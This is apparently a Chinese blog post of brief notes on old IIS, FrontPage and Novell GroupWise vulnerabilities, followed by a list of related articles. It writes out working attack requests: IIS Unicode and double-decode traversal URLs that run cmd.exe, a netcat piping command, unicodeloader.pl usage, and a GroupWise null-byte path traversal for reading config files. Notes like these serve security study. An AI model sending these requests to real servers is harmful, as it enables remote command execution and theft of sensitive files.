WEB应用的一些漏洞

最新推荐文章于 2020-05-25 09:30:07 发布
最新推荐文章于 2020-05-25 09:30:07 发布
阅读量179 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangliyun123456/article/details/84576385
版权

通过netcat进行管道传输,连接到一个脆弱的服务器上

Netcat –vv 网站< htr.txt

URLSCan 一个模板驱动的过滤器,向IIS解析请求

分为两种文件

分别是UrlScan.dllUrlScan.iniUrlScan.ini为配置文件,

向被拒绝的请求发送http404,目标未发现

阻止***者获取任何一点有关目标服务器的信息

 

+.htr源代码泄露,MS01004/default.asp+.htr

Web目录路径泄露 /null.idc

服务器端包含缓冲区溢出/file.stm,.shtm,shtml

.printer缓冲区溢出MS01023/null.printer

索引服务器缓冲区溢出/null.ida,idq

Webhits源泄露MS00006 /null.htw

Frontpage服务器扩展缓冲区溢出 MS01035/_vti_bin/_vti_aut/fp3Oreg.dll

 

 

IIS目录遍历的脆弱点分别是Unicodedouble decode***

讨论一些达到初始访问目的的机制,他们可以征服整个系统

GET/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+’c:\’http/1.0

http://网站/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

 

使用软件unicodeloader.pl

 

unicodeloader.pl  网站:80 C\inetpub\scripts

 

Novell GroupWise任意文件的访问

http//网站/servlet/webacc?User.html=../../../../novell/WebAcess/webacc.cfg%00

 

这种***的另一个后果是:即使运行了生产商的补丁,novell安装的路径也会被暴露,同时会***者可能会窥视WEBacess目录中的commgrCfgldap.cfg文件中的敏感信息


莫疯语
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
用frontpage扩展漏洞***
weixin_33753003的博客
01-12 758
实际上此文属于<<通过WEB服务器进行信息收集和***>>,只是这篇讲述了用frontpage创建站点的一些漏洞。下面,我们来看一看第一个采用Frontpage客户机软件进行的***。支持Frontpage的服务器会有若干个以字母”_vti”开头的工作目录。在任何常用的搜索引擎上搜索默认的Frontpage目录会得到大量从引擎上返回的信息。然...
遇上mysql root 密码为空和frontpage extention漏洞(原创)
liswa 电脑备忘录
12-05 1388
以前只在网上看到过介绍,想不到无意中被我碰上了。事因我很少使用扫描的,所以遇到的漏洞不多。这次刚好心血来潮扫了一个C段,就被我碰上了。是windows主机,但是安装了mysql,X-Scan报告了一些信息,其中有两个引起了我的注意。一种是mysql的root密码为空,一种是frontpage的extention漏洞。1、对于mysql中root密码为空:         使用mysql的连接器连接
五个常见的Web应用漏洞及其解决方法
chuangwei7028的博客
09-26 324
开放Web应用安全项目(OWASP)很快会发布今年的10大Web应用安全漏洞清单。这个清单与去年并没有太大差别,这表明负责应用设计与开发的人仍然没能解决以前那些显而易见的错误。许多最常见的Web应用漏洞仍然广泛存在,许多恶意软件搜索和攻击这些漏洞,连黑客新手都能轻松做到。 本文...
windows常见漏洞分析(三)
jian436的专栏
10-13 971
预防Web应用程序的漏洞
02-03
如今的Web应用程序可能会包含危险的安全缺陷。这些应用程序的全球化部署使其很容易遭受攻击,这些攻击会发现并恶意探测各种安全漏洞Web环境中两个主要的风险在于:注入——也就是SQL注入,它会让黑客更改发往...
web应用漏洞.docx
07-05
Web 应用漏洞知识点总结 在本文中,我们将对 Web 应用漏洞进行总结,涵盖了多种类型的漏洞,如远程代码执行、SQL 注入、跨站脚本攻击(XSS)、文件包含、命令执行、任意文件删除、权限提升等。这些漏洞来自于多种 ...
Web应用进行XSS漏洞测试
03-03
WEB应用进行XSS漏洞测试,不能仅仅局限于在WEB页面输入XSS攻击字段,然后提交。绕过JavaScript的检测,输入XSS脚本,通常被测试人员忽略。下图为XSS恶意输入绕过JavaScript检测的攻击路径。XSS输入通常包含...
Webug4.0 文件包含漏洞
angry_program的博客
01-12 531
文件包含漏洞 参考之前的博客:漏洞之文件包含漏洞 实战 1. 读取网站文件 2. 本地包含执行文件(各种格式都会被当做php解析执行) 3. 远程文件包含 1. 读取网站文件 可以在此之前进行网站信息收集, 知道是什么操作系统(unix)等等。对于网站有了一个大概的了解之后, 再对filename参数一个个尝试(社工), 知道获取到myql的配置文件my.cnf:...
流光2001通过frontpage进行攻击
10-01 993
实际上此文属于>,只是这篇讲述了用frontpage创建站点的一些漏洞,同时流光的后续版本会把搜索此类漏洞加入流光的新增功能。  下面,我们来看一看第一个采用Frontpage客户机软件进行的攻击。支持Frontpage的服务器会有若干个以字母”_vti”开头的工作目录。在任何常用的搜索引擎上搜索默认的Frontpage目录会得到大量从引擎上返回的信息。然后,入侵者就能对这些服务器进行简单而
免费Web应用漏洞扫描工具Vooki
09-28
Vooki是一款免费且用户界面友好的Web应用漏扫工具,它可以轻松地为你扫描任何Web应用并查找漏洞。Vooki主要包括三个部分,Web应用扫描器,Rest API扫描器以及报告 Sql注入 命令注入 头注入 反射型XSS 存储型XSS DOM型XSS 缺少安全标头 恶意JS脚本执行 使用已知不安全组件 Jquery漏洞 Angularjs漏洞 Bootstrap漏洞 响应头中包含敏感信息 错误消息中包含敏感信息 缺少服务器端验证 Javascript动态代码执行 敏感数据泄露
VOOKI:一款免费的Web应用漏洞扫描工具
weixin_30648963的博客
12-13 459
Vooki是一款免费且用户界面友好的Web应用漏扫工具,它可以轻松地为你扫描任何Web应用并查找漏洞。Vooki主要包括三个部分,Web应用扫描器,Rest API扫描器以及报告。Web应用扫描器​Vooki – Web应用扫描器目前支持以下类型的漏洞查找:Sql注入命令注入头注入反射型XSS存储型XSSDOM型XSS缺少安全标头恶意JS脚本执行使用已知不安全组件Jquery漏洞Angu...
Web应用扫描工具Wapiti
11-06 425
Web应用扫描工具Wapiti Wapiti是Kali Linux预置的一款Web应用扫描工具。该工具执行黑盒扫描,用户只需要输入要扫描的网址即可。该工具可以探测文件包含、数据库注入、XSS、CR...
XSSer(超强XSS攻击利器)使用说明中文版
热门推荐
要不,单步调试走起?
10-15 2万+
转自 xxx.com ======================================================================= BackTrack 5 R1 XSS研究之XSSer(超强XSS攻击利器)使用说明中文版                                                     XSSer使用说明
WEB应用漏洞简单介绍
pvlking的专栏
02-20 670
注入: 命令注入:; || | && 等连接语句 XPath注入:针对xml的注入与sql注入类似(要熟悉XML语法) LDAP注入: SQL注入:大家都很熟悉的一个注入 URL参数注入:主要是指通过“&”注入一些额外的参数 跨站脚本(xss):(一般窃取cookie) 反射式: 存储式: 跨站请求伪造(CSRF): 伪造一个URL,让有权限的用户去点击,执行一些有害操作。
Web应用类型扫描识别工具WhatWeb
weixin_34352005的博客
09-12 292
2019独角兽企业重金招聘Python工程师标准>>> ...
autocomplete 属性规定输入字段是否应该启用自动完成功能。
关注前端开发
08-08 984
定义和用法 autocomplete 属性规定输入字段是否应该启用自动完成功能。 自动完成允许浏览器预测对字段的输入。当用户在字段开始键入时,浏览器基于之前键入过的值,应该显示出在字段中填写的选项。 注释:autocomplete 属性适用于 &lt;form&gt;,以及下面的 &lt;input&gt; 类型:text, search, url, telephone, email, pa...
检测到目标web应用表单密码类型输入启用了自动完成操作
W_Y_L_的博客
05-25 1398
描述: 在web应用form表单中,如果input标签没有指定“autocomplete”属性为“off”,则“autocomplete”的属性会自动默认为on。当web应用form表单中的密码类型为input标签,autocomplete属性为on时,用户若提交了一个新的用户名和密码时,浏览器将会询问是否保存该用永久名和密码信息,如果用户选择保存,则之后在显示该web表单时,用户名和密码将会自动填充到对应的输入框中,用户名一旦保存密码,攻击者就可以通过本地浏览器缓存中获取明文密码,导致用户密码敏感信息泄
web应用程序漏洞检查工具
最新发布
04-28
有很多 web 应用程序漏洞检查工具,常见的包括: 1. Burp Suite:功能强大的 web 渗透测试工具,具备漏洞扫描、代理拦截、数据篡改等功能。 2. OWASP ZAP:免费开源的 web 应用程序漏洞扫描器,支持自动和手动扫描...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值